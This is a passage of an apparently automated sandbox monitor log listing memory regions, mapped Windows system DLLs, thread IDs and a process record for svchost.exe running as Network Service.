0x7ff7b3349fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3348000" filename = "" Region: id = 15149 start_va = 0x7ff7b334a000 end_va = 0x7ff7b334bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b334a000" filename = "" Region: id = 15150 start_va = 0x7ff7b334c000 end_va = 0x7ff7b334dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b334c000" filename = "" Region: id = 15151 start_va = 0x7ff7b334e000 end_va = 0x7ff7b334ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b334e000" filename = "" Region: id = 15152 start_va = 0x7ff7b3350000 end_va = 0x7ff7b344ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7b3350000" filename = "" Region: id = 15153 start_va = 0x7ff7b3450000 end_va = 0x7ff7b3472fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7b3450000" filename = "" Region: id = 15154 start_va = 0x7ff7b3473000 end_va = 0x7ff7b3474fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3473000" filename = "" Region: id = 15155 start_va = 0x7ff7b3475000 end_va = 0x7ff7b3475fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3475000" filename = "" Region: id = 15156 start_va = 0x7ff7b3476000 end_va = 0x7ff7b3477fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3476000" filename = "" Region: id = 15157 start_va = 0x7ff7b3478000 end_va = 0x7ff7b3479fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3478000" filename = "" Region: id = 15158 start_va = 0x7ff7b347a000 end_va = 0x7ff7b347bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b347a000" filename = "" Region: id = 15159 start_va = 0x7ff7b347e000 end_va = 0x7ff7b347ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b347e000" filename = "" Region: id = 15160 start_va = 0x7ff7b3dc0000 end_va = 0x7ff7b3dccfff entry_point = 0x7ff7b3dc0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 15161 start_va = 0x7ffbf2590000 end_va = 0x7ffbf25a1fff entry_point = 0x7ffbf2590000 region_type = mapped_file name = "bitsproxy.dll" filename = "\\Windows\\System32\\BitsProxy.dll" (normalized: "c:\\windows\\system32\\bitsproxy.dll") Region: id = 15162 start_va = 0x7ffbf6ee0000 end_va = 0x7ffbf6efdfff entry_point = 0x7ffbf6ee0000 region_type = mapped_file name = "bluetoothapis.dll" filename = "\\Windows\\System32\\BluetoothApis.dll" (normalized: "c:\\windows\\system32\\bluetoothapis.dll") Region: id = 15163 start_va = 0x7ffbf6f00000 end_va = 0x7ffbf6f0cfff entry_point = 0x7ffbf6f00000 region_type = mapped_file name = "bthtelemetry.dll" filename = "\\Windows\\System32\\BthTelemetry.dll" (normalized: "c:\\windows\\system32\\bthtelemetry.dll") Region: id = 15164 start_va = 0x7ffbf6f10000 end_va = 0x7ffbf6f27fff entry_point = 0x7ffbf6f10000 region_type = mapped_file name = "bthradiomedia.dll" filename = "\\Windows\\System32\\BthRadioMedia.dll" (normalized: "c:\\windows\\system32\\bthradiomedia.dll") Region: id = 15165 start_va = 0x7ffbf6f30000 end_va = 0x7ffbf6f43fff entry_point = 0x7ffbf6f30000 region_type = mapped_file name = "wlanradiomanager.dll" filename = "\\Windows\\System32\\WlanRadioManager.dll" (normalized: "c:\\windows\\system32\\wlanradiomanager.dll") Region: id = 15166 start_va = 0x7ffbf7b30000 end_va = 0x7ffbf7b3dfff entry_point = 0x7ffbf7b30000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 15167 start_va = 0x7ffbf9230000 end_va = 0x7ffbf9247fff entry_point = 0x7ffbf9230000 region_type = mapped_file name = "perftrack.dll" filename = "\\Windows\\System32\\perftrack.dll" (normalized: "c:\\windows\\system32\\perftrack.dll") Region: id = 15168 start_va = 0x7ffbf92c0000 end_va = 0x7ffbf934cfff entry_point = 0x7ffbf92c0000 region_type = mapped_file name = "netprofmsvc.dll" filename = "\\Windows\\System32\\netprofmsvc.dll" (normalized: "c:\\windows\\system32\\netprofmsvc.dll") Region: id = 15169 start_va = 0x7ffbf99c0000 end_va = 0x7ffbf9a1efff entry_point = 0x7ffbf99c0000 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 15170 start_va = 0x7ffbf9f50000 end_va = 0x7ffbf9f59fff entry_point = 0x7ffbf9f50000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 15171 start_va = 0x7ffbf9f60000 end_va = 0x7ffbf9f7cfff entry_point = 0x7ffbf9f60000 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 15172 start_va = 0x7ffbfbb40000 end_va = 0x7ffbfbc15fff entry_point = 0x7ffbfbb40000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 15173 start_va = 0x7ffbfbe40000 end_va = 0x7ffbfbe75fff entry_point = 0x7ffbfbe40000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 15174 start_va = 0x7ffbfcfa0000 end_va = 0x7ffbfcfb9fff entry_point = 0x7ffbfcfa0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 15175 start_va = 0x7ffbfcfc0000 end_va = 0x7ffbfcfd5fff entry_point = 0x7ffbfcfc0000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 15176 start_va = 0x7ffbfd170000 end_va = 0x7ffbfd17bfff entry_point = 0x7ffbfd170000 region_type = mapped_file name = "nsisvc.dll" filename = "\\Windows\\System32\\nsisvc.dll" (normalized: "c:\\windows\\system32\\nsisvc.dll") Region: id = 15177 start_va = 0x7ffbfd3d0000 end_va = 0x7ffbfd3f8fff entry_point = 0x7ffbfd3d0000 region_type = mapped_file name = "fontprovider.dll" filename = "\\Windows\\System32\\FontProvider.dll" (normalized: "c:\\windows\\system32\\fontprovider.dll") Region: id = 15178 start_va = 0x7ffbfd400000 end_va = 0x7ffbfd5a3fff entry_point = 0x7ffbfd400000 region_type = mapped_file name = "fntcache.dll" filename = "\\Windows\\System32\\FntCache.dll" (normalized: "c:\\windows\\system32\\fntcache.dll") Region: id = 15179 start_va = 0x7ffbfdb00000 end_va = 0x7ffbfdb79fff entry_point = 0x7ffbfdb00000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 15180 start_va = 0x7ffbfdc20000 end_va = 0x7ffbfdc37fff entry_point = 0x7ffbfdc20000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 15181 start_va = 0x7ffbfe0d0000 end_va = 0x7ffbfe0dafff entry_point = 0x7ffbfe0d0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 15182 start_va = 0x7ffbfe0f0000 end_va = 0x7ffbfe127fff entry_point = 0x7ffbfe0f0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 15183 start_va = 0x7ffbff210000 end_va = 0x7ffbff236fff entry_point = 0x7ffbff210000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 15184 start_va = 0x7ffbff7c0000 end_va = 0x7ffbff7e2fff entry_point = 0x7ffbff7c0000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 15185 start_va = 0x7ffbffdc0000 end_va = 0x7ffbffdf2fff entry_point = 0x7ffbffdc0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 15186 start_va = 0x7ffbfff10000 end_va = 0x7ffbfffb7fff entry_point = 0x7ffbfff10000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 15187 start_va = 0x7ffc00110000 end_va = 0x7ffc0016cfff entry_point = 0x7ffc00110000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 15188 start_va = 0x7ffc00170000 end_va = 0x7ffc00186fff entry_point = 0x7ffc00170000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 15189 start_va = 0x7ffc002e0000 end_va = 0x7ffc002eafff entry_point = 0x7ffc002e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 15190 start_va = 0x7ffc006c0000 end_va = 0x7ffc006e7fff entry_point = 0x7ffc006c0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 15191 start_va = 0x7ffc006f0000 end_va = 0x7ffc0075afff entry_point = 0x7ffc006f0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 15192 start_va = 0x7ffc00760000 end_va = 0x7ffc007f7fff entry_point = 0x7ffc00760000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 15193 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 15194 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 15195 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 15196 start_va = 0x7ffc00f70000 end_va = 0x7ffc00fb3fff entry_point = 0x7ffc00f70000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 15197 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15198 start_va = 0x7ffc01540000 end_va = 0x7ffc015e4fff entry_point = 0x7ffc01540000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 15199 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 15200 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 15201 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 15202 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15203 start_va = 0x7ffc02050000 end_va = 0x7ffc02057fff entry_point = 0x7ffc02050000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 15204 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15205 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 15206 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15207 start_va = 0x7ffc03980000 end_va = 0x7ffc039e8fff entry_point = 0x7ffc03980000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 15208 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 15209 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 15210 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15211 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 1258 os_tid = 0x7e0 Thread: id = 1259 os_tid = 0x72c Thread: id = 1260 os_tid = 0x700 Thread: id = 1261 os_tid = 0x6e8 Thread: id = 1262 os_tid = 0x6d0 Thread: id = 1263 os_tid = 0x6cc Thread: id = 1264 os_tid = 0x6a4 Thread: id = 1265 os_tid = 0x6a0 Thread: id = 1266 os_tid = 0x69c Thread: id = 1267 os_tid = 0x690 Thread: id = 1268 os_tid = 0x68c Thread: id = 1269 os_tid = 0x678 Thread: id = 1270 os_tid = 0x5bc Thread: id = 1271 os_tid = 0x5b0 Thread: id = 1272 os_tid = 0x5a8 Thread: id = 1273 os_tid = 0x41c Thread: id = 1274 os_tid = 0x128 Thread: id = 1275 os_tid = 0x12c Thread: id = 1276 os_tid = 0x120 Thread: id = 1277 os_tid = 0x3fc Thread: id = 1278 os_tid = 0x3ec Thread: id = 1279 os_tid = 0x3e8 Thread: id = 1280 os_tid = 0x3e4 Thread: id = 1281 os_tid = 0x388 Process: id = "287" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x1f432000" os_pid = "0x264" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "child_process" parent_id = "280" os_parent_pid = "0x1e4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k NetworkService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\CryptSvc" [0xa], "NT SERVICE\\Dnscache" [0xe], "NT SERVICE\\LanmanWorkstation" [0xa], "NT SERVICE\\NlaSvc" [0xa], "NT SERVICE\\TapiSrv" [0xa], "NT SERVICE\\TermService" [0xa], "NT SERVICE\\Wecsvc" [0xa], "NT SERVICE\\WinRM" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000fbaa" [0xc000000f], "LOCAL" [0x7] Region: id = 14626 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 14627 start_va = 0xad80000000 end_va = 0xad800fffff entry_point = 0x0 region_type = private name = "private_0x000000ad80000000" filename = "" Region: id = 14628 start_va = 0xad80100000 end_va = 0xad801fffff entry_point = 0x0 region_type = private name = "private_0x000000ad80100000" filename = "" Region: id = 14629 start_va = 0xad80200000 end_va = 0xad802fffff entry_point = 0x0 region_type = private name = "private_0x000000ad80200000" filename = "" Region: id = 14630 start_va = 0xadbbf30000 end_va = 0xadbbf3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000adbbf30000" filename = "" Region: id = 14631 start_va = 0xadbbf40000 end_va = 0xadbbf40fff entry_point = 0xadbbf40000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 14632 start_va = 0xadbbf50000 end_va = 0xadbbf63fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000adbbf50000" filename = "" Region: id = 14633 start_va = 0xadbbf70000 end_va = 0xadbbfeffff entry_point = 0x0 region_type = private name = "private_0x000000adbbf70000" filename = "" Region: id = 14634 start_va = 0xadbbff0000 end_va = 0xadbbff3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000adbbff0000" filename = "" Region: id = 14635 start_va = 0xadbc000000 end_va = 0xadbc000fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000adbc000000" filename = "" Region: id = 14636 start_va = 0xadbc010000 end_va = 0xadbc011fff entry_point = 0x0 region_type = private name = "private_0x000000adbc010000" filename = "" Region: id = 14637 start_va = 0xadbc020000 end_va = 0xadbc0ddfff entry_point = 0xadbc020000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 14638 start_va = 0xadbc0e0000 end_va = 0xadbc0e6fff entry_point = 0x0 region_type = private name = "private_0x000000adbc0e0000" filename = "" Region: id = 14639 start_va = 0xadbc0f0000 end_va = 0xadbc0f0fff entry_point = 0x0 region_type = private name = "private_0x000000adbc0f0000" filename = "" Region: id = 14640 start_va = 0xadbc100000 end_va = 0xadbc1fffff entry_point = 0x0 region_type = private name = "private_0x000000adbc100000" filename = "" Region: id = 14641 start_va = 0xadbc280000 end_va = 0xadbc33ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000adbc280000" filename = "" Region: id = 14642 start_va = 0xadbc340000 end_va = 0xadbc340fff entry_point = 0x0 region_type = private name = "private_0x000000adbc340000" filename = "" Region: id = 14643 start_va = 0xadbc350000 end_va = 0xadbc3cffff entry_point = 0x0 region_type = private name = "private_0x000000adbc350000" filename = "" Region: id = 14644 start_va = 0xadbc3d0000 end_va = 0xadbc3d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000adbc3d0000" filename = "" Region: id = 14645 start_va = 0xadbc3e0000 end_va = 0xadbc3e6fff entry_point = 0x0 region_type = private name = "private_0x000000adbc3e0000" filename = "" Region: id = 14646 start_va = 0xadbc3f0000 end_va = 0xadbc3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000adbc3f0000" filename = "" Region: id = 14647 start_va = 0xadbc400000 end_va = 0xadbc4fffff entry_point = 0x0 region_type = private name = "private_0x000000adbc400000" filename = "" Region: id = 14648 start_va = 0xadbc500000 end_va = 0xadbc687fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000adbc500000" filename = "" Region: id = 14649 start_va = 0xadbc690000 end_va = 0xadbc810fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000adbc690000" filename = "" Region: id = 14650 start_va = 0xadbc820000 end_va = 0xadbc91ffff entry_point = 0x0 region_type = private name = "private_0x000000adbc820000" filename = "" Region: id = 14651 start_va = 0xadbc920000 end_va = 0xadbca1ffff entry_point = 0x0 region_type = private name = "private_0x000000adbc920000" filename = "" Region: id = 14652 start_va = 0xadbca20000 end_va = 0xadbcb1ffff entry_point = 0x0 region_type = private name = "private_0x000000adbca20000" filename = "" Region: id = 14653 start_va = 0xadbcc20000 end_va = 0xadbcd1ffff entry_point = 0x0 region_type = private name = "private_0x000000adbcc20000" filename = "" Region: id = 14654 start_va = 0xadbcd20000 end_va = 0xadbce1ffff entry_point = 0x0 region_type = private name = "private_0x000000adbcd20000" filename = "" Region: id = 14655 start_va = 0xadbce20000 end_va = 0xadbcf1ffff entry_point = 0x0 region_type = private name = "private_0x000000adbce20000" filename = "" Region: id = 14656 start_va = 0xadbd020000 end_va = 0xadbd11ffff entry_point = 0x0 region_type = private name = "private_0x000000adbd020000" filename = "" Region: id = 14657 start_va = 0xadbd120000 end_va = 0xadbd124fff entry_point = 0xadbd120000 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 14658 start_va = 0xadbd130000 end_va = 0xadbd13ffff entry_point = 0xadbd130000 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 14659 start_va = 0xadbd140000 end_va = 0xadbd146fff entry_point = 0x0 region_type = private name = "private_0x000000adbd140000" filename = "" Region: id = 14660 start_va = 0xadbd150000 end_va = 0xadbd152fff entry_point = 0xadbd150000 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui") Region: id = 14661 start_va = 0xadbd160000 end_va = 0xadbd160fff entry_point = 0x0 region_type = private name = "private_0x000000adbd160000" filename = "" Region: id = 14662 start_va = 0xadbd170000 end_va = 0xadbd170fff entry_point = 0x0 region_type = private name = "private_0x000000adbd170000" filename = "" Region: id = 14663 start_va = 0xadbd180000 end_va = 0xadbd18ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000adbd180000" filename = "" Region: id = 14664 start_va = 0xadbd190000 end_va = 0xadbd19ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000adbd190000" filename = "" Region: id = 14665 start_va = 0xadbd1a0000 end_va = 0xadbd1affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000adbd1a0000" filename = "" Region: id = 14666 start_va = 0xadbd1b0000 end_va = 0xadbd1bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000adbd1b0000" filename = "" Region: id = 14667 start_va = 0xadbd1c0000 end_va = 0xadbd1cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000adbd1c0000" filename = "" Region: id = 14668 start_va = 0xadbd1d0000 end_va = 0xadbd1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000adbd1d0000" filename = "" Region: id = 14669 start_va = 0xadbd1e0000 end_va = 0xadbd1e0fff entry_point = 0x0 region_type = private name = "private_0x000000adbd1e0000" filename = "" Region: id = 14670 start_va = 0xadbd1f0000 end_va = 0xadbd1f0fff entry_point = 0x0 region_type = private name = "private_0x000000adbd1f0000" filename = "" Region: id = 14671 start_va = 0xadbd200000 end_va = 0xadbd200fff entry_point = 0x0 region_type = private name = "private_0x000000adbd200000" filename = "" Region: id = 14672 start_va = 0xadbd210000 end_va = 0xadbd213fff entry_point = 0x0 region_type = private name = "private_0x000000adbd210000" filename = "" Region: id = 14673 start_va = 0xadbd220000 end_va = 0xadbd31ffff entry_point = 0x0 region_type = private name = "private_0x000000adbd220000" filename = "" Region: id = 14674 start_va = 0xadbd320000 end_va = 0xadbd656fff entry_point = 0xadbd320000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 14675 start_va = 0xadbd660000 end_va = 0xadbd66ffff entry_point = 0xadbd660000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 14676 start_va = 0xadbd670000 end_va = 0xadbd67ffff entry_point = 0xadbd670000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 14677 start_va = 0xadbd680000 end_va = 0xadbd68ffff entry_point = 0xadbd680000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 14678 start_va = 0xadbd690000 end_va = 0xadbd69ffff entry_point = 0xadbd690000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 14679 start_va = 0xadbd6a0000 end_va = 0xadbd6affff entry_point = 0xadbd6a0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 14680 start_va = 0xadbd6b0000 end_va = 0xadbd6bffff entry_point = 0xadbd6b0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 14681 start_va = 0xadbd760000 end_va = 0xadbd7dffff entry_point = 0x0 region_type = private name = "private_0x000000adbd760000" filename = "" Region: id = 14682 start_va = 0xadbd7e0000 end_va = 0xadbd7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000adbd7e0000" filename = "" Region: id = 14683 start_va = 0xadbd7f0000 end_va = 0xadbd7fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000adbd7f0000" filename = "" Region: id = 14684 start_va = 0xadbd800000 end_va = 0xadbd80ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000adbd800000" filename = "" Region: id = 14685 start_va = 0xadbd810000 end_va = 0xadbd81ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000adbd810000" filename = "" Region: id = 14686 start_va = 0xadbd820000 end_va = 0xadbd82ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000adbd820000" filename = "" Region: id = 14687 start_va = 0xadbd830000 end_va = 0xadbd83ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000adbd830000" filename = "" Region: id = 14688 start_va = 0xadbd840000 end_va = 0xadbd841fff entry_point = 0x0 region_type = private name = "private_0x000000adbd840000" filename = "" Region: id = 14689 start_va = 0xadbd850000 end_va = 0xadbd850fff entry_point = 0x0 region_type = private name = "private_0x000000adbd850000" filename = "" Region: id = 14690 start_va = 0xadbd860000 end_va = 0xadbd95ffff entry_point = 0x0 region_type = private name = "private_0x000000adbd860000" filename = "" Region: id = 14691 start_va = 0xadbd960000 end_va = 0xadbd968fff entry_point = 0xadbd960000 region_type = mapped_file name = "vsstrace.dll.mui" filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 14692 start_va = 0xadbd970000 end_va = 0xadbd970fff entry_point = 0x0 region_type = private name = "private_0x000000adbd970000" filename = "" Region: id = 14693 start_va = 0xadbd980000 end_va = 0xadbd980fff entry_point = 0x0 region_type = private name = "private_0x000000adbd980000" filename = "" Region: id = 14694 start_va = 0xadbd990000 end_va = 0xadbd99ffff entry_point = 0xadbd990000 region_type = mapped_file name = 